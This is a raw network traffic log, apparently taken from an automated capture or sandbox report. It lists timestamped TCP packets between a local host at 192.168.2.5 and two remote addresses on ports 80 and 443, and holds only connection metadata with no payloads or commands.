                                                                                                                                                                                        Nov 24, 2024 02:13:30.252161026 CET4434973713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.253099918 CET49737443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.253106117 CET4434973713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.275346994 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.312592983 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.313106060 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.313119888 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.313730001 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.313735962 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.352482080 CET4434973813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.353076935 CET49738443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.353085995 CET4434973813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.353668928 CET49738443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.353673935 CET4434973813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.397802114 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.397958994 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.397974968 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.398050070 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.398288965 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.398303986 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.398356915 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.398420095 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.398468971 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.399256945 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.399339914 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.399355888 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.399399042 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.400172949 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.400234938 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.400250912 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.400304079 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.401115894 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.401163101 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.401177883 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.401230097 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.402081966 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.402134895 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.402139902 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.402157068 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.402215958 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.403039932 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.403103113 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.403117895 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.403172016 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.403986931 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.404040098 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.404056072 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.404103041 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.404153109 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.404952049 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.404978991 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.404997110 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.405054092 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.405952930 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.405994892 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.406011105 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.406055927 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.406085014 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.406888008 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.406936884 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.406951904 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.407013893 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.407835960 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.407886982 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.407902002 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.407938004 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.407972097 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.408823967 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.408881903 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.408898115 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.408932924 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.409739971 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.409800053 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.409816027 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.409856081 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.409892082 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.410725117 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.410751104 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.410764933 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.410811901 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.411658049 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.411710024 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.411726952 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.411789894 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.412616968 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.412662983 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.412677050 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.413135052 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.413584948 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.413599968 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.413615942 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.413650990 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.413681984 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.414518118 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.414563894 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.414578915 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.414628983 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.415492058 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.415544987 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.415551901 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.415568113 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.415623903 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.416476011 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.416501999 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.416516066 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.416562080 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.417418003 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.417464972 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.417479992 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.417526960 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.417562962 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.418355942 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.418725967 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.418781042 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.418786049 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.418796062 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.418847084 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.419667006 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.419728041 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.419744015 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.419784069 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.420584917 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.420635939 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.420644045 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.420660019 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.420706987 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.421545029 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.421610117 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.421627045 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.421679020 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.422517061 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.422544003 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.422558069 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.422566891 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.422704935 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.423474073 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.423521996 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.423537970 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.423590899 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.424442053 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.424467087 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.424483061 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.424530983 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.424551964 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.425431967 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.425458908 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.425472975 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.425533056 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.426337004 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.426388979 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.426388979 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.426407099 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.426456928 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.427333117 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.427361012 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.427377939 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.427412033 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.428287983 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.428330898 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.428342104 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.428347111 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.428395033 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.428422928 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.428565025 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.428625107 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.428769112 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.428786039 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.428795099 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.428800106 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.429249048 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.429265976 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.429327011 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.429332972 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.430211067 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.430227041 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.430279016 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.430294037 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.431075096 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.431153059 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.433955908 CET49740443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.434007883 CET4434974013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.434092999 CET49740443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.434303045 CET49740443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.434322119 CET4434974013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.493344069 CET4434973913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.494009972 CET49739443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.494021893 CET4434973913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.494833946 CET49739443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.494839907 CET4434973913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.608396053 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.608473063 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.608489037 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.608556032 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.608779907 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.608854055 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.608870983 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.608918905 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.609749079 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.609824896 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.609839916 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.609929085 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.610707045 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.610769987 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.610785961 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.610831976 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.610857010 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.611656904 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.611711025 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.611726999 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.611764908 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.612620115 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.612684965 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.612700939 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.612745047 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.613604069 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.613630056 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.613646030 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.613687038 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.614542961 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.614608049 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.614623070 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.614666939 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.614706993 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.615499973 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.615550041 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.615566015 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.615602970 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.616451979 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.616477966 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.616492987 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.616528988 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.616565943 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.617405891 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.617443085 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.617458105 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.617497921 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.618395090 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.618453026 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.618468046 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.618514061 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.618546009 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.619322062 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.619374037 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.619388103 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.619425058 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.620269060 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.620310068 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.620332003 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.620388985 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.621275902 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.621320963 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.621340990 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.621382952 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.622219086 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.622270107 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.622284889 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.622325897 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.622364044 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.623193979 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.623256922 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.623271942 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.623311043 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.624154091 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.624170065 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.624207020 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.624250889 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.624286890 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.625139952 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.625204086 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.625220060 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.625262022 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.626060963 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.626168966 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.626183987 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.626234055 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.627008915 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.627023935 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.627079010 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.627154112 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.627954960 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.627981901 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.627998114 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.628042936 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.628081083 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.628899097 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.629236937 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.629292011 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.629295111 CET4972980192.168.2.5185.215.113.16
